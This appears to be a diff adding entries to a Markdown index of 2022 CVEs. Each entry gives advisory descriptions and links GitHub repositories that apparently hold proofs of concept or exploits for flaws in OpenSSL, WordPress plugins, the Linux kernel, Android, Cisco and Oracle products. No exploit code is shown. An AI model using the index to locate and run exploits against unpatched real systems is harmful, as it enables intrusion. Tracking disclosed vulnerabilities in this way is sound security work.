[Eap2468/CVE-2022-3699](https://github.com/Eap2468/CVE-2022-3699) + +### CVE-2022-3786 (2022-11-01) + +A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the `.' character (decimal 46) on the stack. This buffer overflow could result in a crash (causing a denial of service). In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.\n\n + + +- [WhatTheFuzz/openssl-fuzz](https://github.com/WhatTheFuzz/openssl-fuzz) + +### CVE-2022-3904 (2023-01-16) + +The MonsterInsights WordPress plugin before 8.9.1 does not sanitize or escape page titles in the top posts/pages section, allowing an unauthenticated attacker to inject arbitrary web scripts into the titles by spoofing requests to google analytics. + + +- [RandomRobbieBF/CVE-2022-3904](https://github.com/RandomRobbieBF/CVE-2022-3904) + +### CVE-2022-3910 (2022-11-22) + +Use After Free vulnerability in Linux Kernel allows Privilege Escalation. An improper Update of Reference Count in io_uring leads to Use-After-Free and Local Privilege Escalation.\nWhen io_msg_ring was invoked with a fixed file, it called io_fput_file() which improperly decreased its reference count (leading to Use-After-Free and Local Privilege Escalation). Fixed files are permanently registered to the ring, and should not be put separately.\n\nWe recommend upgrading past commit https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 \n + + +- [veritas501/CVE-2022-3910](https://github.com/veritas501/CVE-2022-3910) +- [TLD1027/CVE-2022-3910](https://github.com/TLD1027/CVE-2022-3910) + +### CVE-2022-3942 (2022-11-11) + +A vulnerability was found in SourceCodester Sanitization Management System and classified as problematic. This issue affects some unknown processing of the file php-sms/?p=request_quote. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-213449 was assigned to this vulnerability. + + +- [maikroservice/CVE-2022-3942](https://github.com/maikroservice/CVE-2022-3942) + +### CVE-2022-3949 (2022-11-11) + +A vulnerability, which was classified as problematic, has been found in Sourcecodester Simple Cashiering System. This issue affects some unknown processing of the component User Account Handler. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-213455. + + +- [maikroservice/CVE-2022-3949](https://github.com/maikroservice/CVE-2022-3949) + +### CVE-2022-3992 (2022-11-14) + +A vulnerability classified as problematic was found in SourceCodester Sanitization Management System. Affected by this vulnerability is an unknown functionality of the file admin/?page=system_info of the component Banner Image Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-213571. + + +- [Urban4/CVE-2022-3992](https://github.com/Urban4/CVE-2022-3992) + +### CVE-2022-4047 (2022-12-26) + +The Return Refund and Exchange For WooCommerce WordPress plugin before 4.0.9 does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE + + +- [im-hanzou/WooRefer](https://github.com/im-hanzou/WooRefer) +- [entroychang/CVE-2022-4047](https://github.com/entroychang/CVE-2022-4047) + +### CVE-2022-4060 (2023-01-16) + +The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it. + + +- [im-hanzou/UPGer](https://github.com/im-hanzou/UPGer) + +### CVE-2022-4061 (2022-12-19) + +The JobBoardWP WordPress plugin before 1.2.2 does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP. + + +- [im-hanzou/JBWPer](https://github.com/im-hanzou/JBWPer) + +### CVE-2022-4063 (2022-12-19) + +The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files & URLs, which may enable them to run code on servers. + + +- [im-hanzou/INPGer](https://github.com/im-hanzou/INPGer) + +### CVE-2022-4096 (2022-11-21) + +Server-Side Request Forgery (SSRF) in GitHub repository appsmithorg/appsmith prior to 1.8.2. + + +- [aminetitrofine/CVE-2022-4096](https://github.com/aminetitrofine/CVE-2022-4096) + +### CVE-2022-4262 (2022-12-02) + +Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [bjrjk/CVE-2022-4262](https://github.com/bjrjk/CVE-2022-4262) +- [mistymntncop/CVE-2022-4262](https://github.com/mistymntncop/CVE-2022-4262) +- [quangnh89/CVE-2022-4262](https://github.com/quangnh89/CVE-2022-4262) + +### CVE-2022-4304 (2023-02-08) + +A timing based side channel exists in the OpenSSL RSA Decryption implementation\nwhich could be sufficient to recover a plaintext across a network in a\nBleichenbacher style attack. To achieve a successful decryption an attacker\nwould have to be able to send a very large number of trial messages for\ndecryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,\nRSA-OEAP and RSASVE.\n\nFor example, in a TLS connection, RSA is commonly used by a client to send an\nencrypted pre-master secret to the server. An attacker that had observed a\ngenuine connection between a client and a server could use this flaw to send\ntrial messages to the server and record the time taken to process them. After a\nsufficiently large number of messages the attacker could recover the pre-master\nsecret used for the original connection and thus be able to decrypt the\napplication data sent over that connection.\n\n + + +- [Trinadh465/Openssl-1.1.1g_CVE-2022-4304](https://github.com/Trinadh465/Openssl-1.1.1g_CVE-2022-4304) + +### CVE-2022-4395 (2023-01-30) + +The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE. + + +- [MrG3P5/CVE-2022-4395](https://github.com/MrG3P5/CVE-2022-4395) + +### CVE-2022-4510 (2023-01-25) + +\nA path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins.\n This vulnerability is associated with program files src/binwalk/plugins/unpfs.py.\n\nThis issue affects binwalk from 2.1.2b through 2.3.3 included.\n\n + + +- [electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510) +- [adhikara13/CVE-2022-4510-WalkingPath](https://github.com/adhikara13/CVE-2022-4510-WalkingPath) +- [Kalagious/BadPfs-CVE-2022-4510](https://github.com/Kalagious/BadPfs-CVE-2022-4510) + +### CVE-2022-4539 (2024-08-31) + +The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + + +- [Abdurahmon3236/CVE-2022-4539](https://github.com/Abdurahmon3236/CVE-2022-4539) + +### CVE-2022-4543 (2023-01-11) + +A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems. + + +- [sunichi/cve-2022-4543-wrapper](https://github.com/sunichi/cve-2022-4543-wrapper) + +### CVE-2022-4611 (2022-12-19) + +Es wurde eine problematische Schwachstelle in Click Studios Passwordstate and Passwordstate Browser Extension Chrome gefunden. Dabei betrifft es einen unbekannter Codeteil. Mit der Manipulation mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [Phamchie/CVE-2022-4611](https://github.com/Phamchie/CVE-2022-4611) +- [fgsoftware1/CVE-2022-4611](https://github.com/fgsoftware1/CVE-2022-4611) + +### CVE-2022-4616 (2023-01-12) + +The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to \ncommand injection through the network diagnosis page. This vulnerability\n could allow a remote unauthenticated user to add files, delete files, \nand change file permissions.\n\n + + +- [ahanel13/CVE-2022-4616-POC](https://github.com/ahanel13/CVE-2022-4616-POC) + +### CVE-2022-4896 (2023-09-12) + +Cyber Control, in its 1.650 version, is affected by a vulnerability in the generation on the server of pop-up windows with the messages "PNTMEDIDAS", "PEDIR", "HAYDISCOA" or "SPOOLER". A complete denial of service can be achieved by sending multiple requests simultaneously on a core. + + +- [sapellaniz/CVE-2022-4896](https://github.com/sapellaniz/CVE-2022-4896) + +### CVE-2022-4939 (2023-04-05) + +THe WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator. + + +- [BaconCriCRi/PoC-CVE-2022-4939-](https://github.com/BaconCriCRi/PoC-CVE-2022-4939-) + +### CVE-2022-4944 (2023-04-22) + +Eine problematische Schwachstelle wurde in kalcaddle KodExplorer bis 4.49 entdeckt. Davon betroffen ist unbekannter Code. Durch Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.50 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [brosck/CVE-2022-4944](https://github.com/brosck/CVE-2022-4944) + ### CVE-2022-5561 - [Kvi74/CVE-2022-5561](https://github.com/Kvi74/CVE-2022-5561) ### CVE-2022-8475 - [Kvi74/CVE-2022-8475](https://github.com/Kvi74/CVE-2022-8475) +### CVE-2022-10270 +- [baimaobg/sunflower_exp](https://github.com/baimaobg/sunflower_exp) + +### CVE-2022-14733 +- [hkzck/CVE-2022-14733](https://github.com/hkzck/CVE-2022-14733) + ### CVE-2022-20004 (2022-05-10) In checkSlicePermission of SliceManagerService.java, it is possible to access any slice URI due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-179699767 @@ -309,6 +17678,239 @@ - [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007) +- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007) + +### CVE-2022-20009 (2022-05-10) + +In various functions of the USB gadget subsystem, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-213172319References: Upstream kernel + + +- [szymonh/android-gadget](https://github.com/szymonh/android-gadget) + +### CVE-2022-20120 (2022-05-10) + +Product: AndroidVersions: Android kernelAndroid ID: A-203213034References: N/A + + +- [boredpentester/ABL_ROP](https://github.com/boredpentester/ABL_ROP) + +### CVE-2022-20126 (2022-06-15) + +In setScanMode of AdapterService.java, there is a possible way to enable Bluetooth discovery mode without user interaction due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-203431023 + + +- [Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126](https://github.com/Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126) + +### CVE-2022-20128 +- [irsl/CVE-2022-20128](https://github.com/irsl/CVE-2022-20128) + +### CVE-2022-20130 (2022-06-15) + +In transportDec_OutOfBandConfig of tpdec_lib.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224314979 + + +- [Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130](https://github.com/Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130) + +### CVE-2022-20138 (2022-06-15) + +In ACTION_MANAGED_PROFILE_PROVISIONED of DevicePolicyManagerService.java, there is a possible way for unprivileged app to send MANAGED_PROFILE_PROVISIONED intent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-210469972 + + +- [ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138) + +### CVE-2022-20140 (2022-06-15) + +In read_multi_rsp of gatt_sr.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-227618988 + + +- [RenukaSelvar/system_bt_aosp10_cve-2022-20140](https://github.com/RenukaSelvar/system_bt_aosp10_cve-2022-20140) + +### CVE-2022-20142 (2022-06-15) + +In createFromParcel of GeofenceHardwareRequestParcelable.java, there is a possible arbitrary code execution due to parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-216631962 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142) +- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142) + +### CVE-2022-20186 (2022-06-15) + +In kbase_mem_alias of mali_kbase_mem_linux.c, there is a possible arbitrary code execution due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-215001024References: N/A + + +- [Bariskizilkaya/CVE-2022-20186_CTXZ](https://github.com/Bariskizilkaya/CVE-2022-20186_CTXZ) +- [SmileTabLabo/CVE-2022-20186](https://github.com/SmileTabLabo/CVE-2022-20186) + +### CVE-2022-20223 (2022-07-13) + +In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-223578534 + + +- [xbee9/cve-2022-20223](https://github.com/xbee9/cve-2022-20223) + +### CVE-2022-20224 (2022-07-13) + +In AT_SKIP_REST of bta_hf_client_at.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure in the Bluetooth stack with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-220732646 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224) +- [hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224) + +### CVE-2022-20229 (2022-07-13) + +In bta_hf_client_handle_cind_list_item of bta_hf_client_at.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224536184 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229) + +### CVE-2022-20338 (2022-08-11) + +In HierarchicalUri.readFrom of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to a local escalation of privilege, preventing processes from validating URIs correctly, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-171966843 + + +- [Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338](https://github.com/Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338) +- [Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338) + +### CVE-2022-20347 (2022-08-09) + +In onAttach of ConnectedDeviceDashboardFragment.java, there is a possible permission bypass due to a confused deputy. This could lead to remote escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228450811 + + +- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347) +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347) +- [hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347) + +### CVE-2022-20360 (2022-08-09) + +In setChecked of SecureNfcPreferenceController.java, there is a missing permission check. This could lead to local escalation of privilege from the guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228314987 + + +- [726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360](https://github.com/726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360) + +### CVE-2022-20361 (2022-08-09) + +In btif_dm_auth_cmpl_evt of btif_dm.cc, there is a possible vulnerability in Cross-Transport Key Derivation due to Weakness in Bluetooth Standard. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-231161832 + + +- [francozappa/blur](https://github.com/francozappa/blur) + +### CVE-2022-20409 (2022-10-11) + +In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238177383References: Upstream kernel + + +- [Markakd/bad_io_uring](https://github.com/Markakd/bad_io_uring) + +### CVE-2022-20413 (2022-10-11) + +In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-235850634 + + +- [pazhanivel07/frameworks_av-r33_CVE-2022-20413](https://github.com/pazhanivel07/frameworks_av-r33_CVE-2022-20413) + +### CVE-2022-20421 (2022-10-11) + +In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel + + +- [0xkol/badspin](https://github.com/0xkol/badspin) + +### CVE-2022-20452 (2022-11-08) + +In initializeFromParcelLocked of BaseBundle.java, there is a possible method arbitrary code execution due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-240138318 + + +- [michalbednarski/LeakValue](https://github.com/michalbednarski/LeakValue) + +### CVE-2022-20456 (2023-01-24) + +In AutomaticZenRule of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703780 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456) + +### CVE-2022-20470 (2022-12-13) + +In bindRemoteViewsService of AppWidgetServiceImpl.java, there is a possible way to bypass background activity launch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-234013191 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470) + +### CVE-2022-20473 (2022-12-13) + +In toLanguageTag of LocaleListCache.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-239267173 + + +- [Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473) +- [Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473) + +### CVE-2022-20474 (2022-12-13) + +In readLazyValue of Parcel.java, there is a possible loading of arbitrary code into the System Settings app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-240138294 + + +- [cxxsheng/CVE-2022-20474](https://github.com/cxxsheng/CVE-2022-20474) + +### CVE-2022-20489 (2023-01-24) + +In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703460 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old) +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489) + +### CVE-2022-20490 (2023-01-24) + +In multiple functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703505 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490) + +### CVE-2022-20492 (2023-01-24) + +In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242704043 + + +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492) + +### CVE-2022-20493 (2023-01-24) + +In Condition of Condition.java, there is a possible way to grant notification access due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242846316 + + +- [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493) + +### CVE-2022-20494 (2023-01-24) + +In AutomaticZenRule of AutomaticZenRule.java, there is a possible persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243794204 + + +- [Supersonic/CVE-2022-20494](https://github.com/Supersonic/CVE-2022-20494) + +### CVE-2022-20607 (2022-12-16) + +In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N/A + + +- [sumeetIT/CVE-2022-20607](https://github.com/sumeetIT/CVE-2022-20607) + +### CVE-2022-20699 (2022-02-10) + +Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. + + +- [Audiobahn/CVE-2022-20699](https://github.com/Audiobahn/CVE-2022-20699) +- [puckiestyle/CVE-2022-20699](https://github.com/puckiestyle/CVE-2022-20699) +- [rohan-flutterint/CVE-2022-20699](https://github.com/rohan-flutterint/CVE-2022-20699) + +### CVE-2022-20818 (2022-09-30) + +Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user. + + +- [mbadanoiu/CVE-2022-20818](https://github.com/mbadanoiu/CVE-2022-20818) ### CVE-2022-20829 (2022-06-24) @@ -317,6 +17919,64 @@ - [jbaines-r7/theway](https://github.com/jbaines-r7/theway) +### CVE-2022-20866 (2022-08-10) + +A vulnerability in the handling of RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve an RSA private key. This vulnerability is due to a logic error when the RSA key is stored in memory on a hardware platform that performs hardware-based cryptography. An attacker could exploit this vulnerability by using a Lenstra side-channel attack against the targeted device. A successful exploit could allow the attacker to retrieve the RSA private key. The following conditions may be observed on an affected device: This vulnerability will apply to approximately 5 percent of the RSA keys on a device that is running a vulnerable release of Cisco ASA Software or Cisco FTD Software; not all RSA keys are expected to be affected due to mathematical calculations applied to the RSA key. The RSA key could be valid but have specific characteristics that make it vulnerable to the potential leak of the RSA private key. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. See the Indicators of Compromise section for more information on the detection of this type of RSA key. The RSA key could be malformed and invalid. A malformed RSA key is not functional, and a TLS client connection to a device that is running Cisco ASA Software or Cisco FTD Software that uses the malformed RSA key will result in a TLS signature failure, which means a vulnerable software release created an invalid RSA signature that failed verification. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. + + +- [CiscoPSIRT/CVE-2022-20866](https://github.com/CiscoPSIRT/CVE-2022-20866) + +### CVE-2022-21241 (2022-02-08) + +Cross-site scripting vulnerability in CSV+ prior to 0.8.1 allows a remote unauthenticated attacker to inject an arbitrary script or an arbitrary OS command via a specially crafted CSV file that contains HTML a tag. + + +- [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability) + +### CVE-2022-21306 (2022-01-19) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [hktalent/CVE-2022-21306](https://github.com/hktalent/CVE-2022-21306) + +### CVE-2022-21340 (2022-01-19) + +Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). + + +- [Alexandre-Bartel/CVE-2022-21340](https://github.com/Alexandre-Bartel/CVE-2022-21340) + +### CVE-2022-21350 (2022-01-19) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L). + + +- [hktalent/CVE-2022-21350](https://github.com/hktalent/CVE-2022-21350) + +### CVE-2022-21371 (2022-01-19) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that 